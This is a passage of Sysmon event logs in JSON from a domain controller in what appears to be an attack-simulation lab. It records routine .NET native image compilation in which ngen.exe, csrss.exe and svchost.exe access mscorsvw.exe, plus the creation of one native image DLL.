05:58:19.042","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00101FB40C00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.042\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.042","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00101FB40C00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.042\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.042","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00101FB40C00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:19.120\r\nProcessGuid: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nProcessId: 656\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\290-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll\r\nCreationUtcTime: 2020-08-01 05:58:19.120","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:19.120","ProcessGuid":"{A837DB8D-047B-5F25-0000-00101FB40C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\290-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll","CreationUtcTime":"2020-08-01 05:58:19.120","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.136\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.136","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.136\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.136","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.136\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.136","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.167\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.167","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.167\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.167","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 